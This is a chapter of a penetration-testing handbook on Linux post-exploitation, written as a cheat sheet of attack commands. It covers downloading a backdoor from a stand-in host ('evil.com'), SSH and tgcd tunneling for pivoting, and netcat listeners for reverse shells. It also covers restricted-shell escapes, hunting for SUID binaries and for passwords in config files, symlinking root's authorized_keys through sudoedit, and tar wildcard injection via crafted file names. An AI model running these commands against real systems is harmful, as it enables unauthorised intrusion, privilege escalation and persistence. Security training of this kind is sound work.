Chapter 5 - Linux Post-Exploitation

Unplug the network cable and instantiate draconian measures for physical security, You’ll make sure nobody can get in, but you’ll also make sure that nobody actually wants to use the platform. And that may sound like an extreme case, but it’s a very fundamental issue in security. You cannot look at security as something separate. Security issues are ‘just’ normal bugs

— Linus Torvald

This is the phase I like to refer to as second pass enumeration or enumeration from the inside. Now that we've gained a foothold into the network it is crucial to run all of our enumeration from the ground up as an inside actor.

Resources

The Linux Programming Interface

DirtyCow

kernel-exploits - GitHub

Linux Kernel Exploits - GitHub

Basic Linux Privilege Escalation - g0tm1lk

UNIX PrivEsc Check

LinEnum

linuxprivchecker.py

Linux PrivEsc for fun and profit and all around mischief

A PenTester's Guide to Pivoting

Understanding systemd

Privesc Checking

Kali> unix-privesc-check standard > upcheck.standard
    > unix-privesc-check detailed > upcheck.detailed

Kali> enum4linux -av $TARGET > enum4linux.target

Kali> ./LinEnum -s -k keyword -r report -e /tmp/ -t
          -k    Enter keyword
          -e    Enter export location
          -t    Include thorough (lengthy) tests
          -s    Supply current user password to check sudo perms (INSECURE)
          -r    Enter report name
[LinEnum Github] (https://github.com/rebootuser/LinEnum)

Kali> python linuxprivchecker.py

Listing Packages

Kali> dpkg -l
Kali> rpm -qa

Uploading Files

Kali> wget http://evil.com/backdoor.py
Kali> curl http://evil.com/backdoor.py
Kali> scp ~/backdoor.py user@$TARGET:tmp/backdoor.py

Port Redirection

rinetd

rinetd

vi /etc/rinetd.conf
# bind      # port        # connect       # port
a.b.c.d     53            e.f.g.h         80

SSH

Generate key

Kali> ssh-keygen -t rsa

SSH with Key

Kali> ssh -i key_file user@host

SSH Tunneling

# Local Tunnel
Kali> ssh $ATTACKER -L 3000:$TARGET:2222

# Remote Tunnel
Kali> ssh $TARGET -R 2222:localhost:3000

# Dynamic Tunnel to $TARGET
Kali> ssh -D 127.0.0.1:3000 -N username@$TARGET

tgcd tunneling

Kali> tgcd -L -p 9999 -q 40000
Kali> tgcd -C -s IP:9999 -c ATTACKER:40000
Kali> iptables -t nat -A OUTPUT -d IP -j DNAT --to-destination 127.0.0.1

HTTP Tunneling

Kali> nc -vvn $TARGET 8888
CONNECT $TARGET2:80 HTTP/1.0

Proxychains

# create reverse ssh tunnel on our target
Kali> ssh -f -N -R 2222:127.0.0.1:22 root@$ATTACKER

# create on our attacking machine
Kali> ssh -f -N -D 127.0.0.1:8080 -p 2222

# Good to go
Kali> proxychains nmap -sV $TARGET

Networking

# Set IP

Kali> ifconfig eth0 xxx.xxx.xxx.xxx/24


# Calculate subnet

Kali> ipcalc xxx.xxx.xxx.xxx/24


# Bring devices up/down

Kali> ifconfig eth0 up
Kali> ifconfig eth0 down


# Get IP from DHCP

Kali> dhclient


# Log traffic for ICMP packets

Kali> tcpdump -i tun0 icmp


# Test from remote box

Kali> ping $ATTACKER -c 3

Listen for Shell

Resources

Reverse Shell Cheat Sheet

TCP

Kali> nc -vlnp 54321

UDP

    Kali> socat file:`tty`,echo=0,raw udp-listen:54321

Start a simple HTTP server

Kali> python -m SimpleHTTPServer 80
Kali> python3 -m http.server
Kali> ruby -r webrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"
Kali> php -S 0.0.0.0:80

Bash Foo

bin2shellcode

function bin2sc {
    hexdump -v -e '"\\""x" 1/1 "%02x" ""'${1}
}

Scan for string in all files in a directory

Kali> du . | awk '{print $2}'| grep -rnw "string" --color

Convert file contents to lowercase

Kali> tr '[:upper:]' '[:lower:]'< inputfile

Simple for loop

Kali> for i in`seq 10 20`;do this;done

Remove last byte from a file

Kali> truncate -s -1 filename

Hijack full path to a binary for current pts

Kali> function/usr/bin/foo () { /usr/bin/echo "It works"; }
Kali> export -f /usr/bin/foo

Use Env to force scripts to run a different command

Kali> ln -s /usr/bin/nano cat
Kali> export PATH=.:$PATH

Port Knocking

Kali> for x in port1 port2 port3;do nmap -Pn --host_timeout 201 --max-retries -p $x $TARGET;done
Kali> nc -z $TARGET port1 port2 port3;

Breakout Shell

Resources

Escape from Shellcatraz: Breaking out of restricted UNIX shells

Kali> awk ‘BEGIN {system(“/bin/bash”)}’
Kali> python -c ‘import pty; pty.spawn(“/bin/bash”)’
Kali> echo os.system(‘/bin/bash’);
Kali> /bin/sh -i

Upgrade Shell

Netcat

# Background current shell: CTRL + Z

Kali> stty raw -echo
Kali> fg

Resources

Upgrading Simple shells to fully interactive TTYs

Insecure Sudo

Kali> sudo -l

Finding gems on the file system

# Find commands for SUID or SGID
Kali> find / -perm -g=s -type f 2>/dev/null
Kali> find / -perm -u=s -type f 2>/dev/null

# Find commands for writable/executable directories
Kali> find / -writable -type d 2>/dev/null
Kali> find / -perm -o w -type d 2>/dev/null
Kali> find / -perm -o x -type d 2>/dev/null

# Sometimes a quick bit of information can be helpful
# Especially if you get access denied when you try to run a command
# Such as iptables -L
Kali> locate iptables

# Locate useful files like gcc, wget, etc
Kali> locate gcc

# Take advantage of wildcard searching
# This is only a base example of what you can do
# I use this technique often to find random things hidden deep in the file system
Kali> ls /*/*/*/*.conf

# Be creative
Kali> cat /etc/cron.*/* | grep SEARCHSTRING

# Mix it up
Kali> find / -type f -name '*.conf' | xargs grep -rnw -3 "Password" 2>/dev/null

Unmounted drives

Kali> cat /etc/fstab
Kali> mount

Exim

Kali> exim -bV -v | grep -i Perl

Wildcard Manipulation

Resources

UNIX Wildcards gone wild

Sudoedit

# if sudoedit is using wildcards you can escape out with a few techniques
# Such as:  (root) NOPASSWD: sudoedit /var/www/*/*/file.html
Kali> ln -s /root/.ssh/authorized_keys /var/www/testing/testdir/file.html
# Now when you add your key to this file, you will be able to login to root, for example

Tar

# If there is a script running as an authorized user that uses wildcards to tar a folder, you can inject command line arguments via:
Kali> echo '' > "--checkpoint-action=exec='sh shell.sh'"
Kali> echo '' > "--checkpoint=1"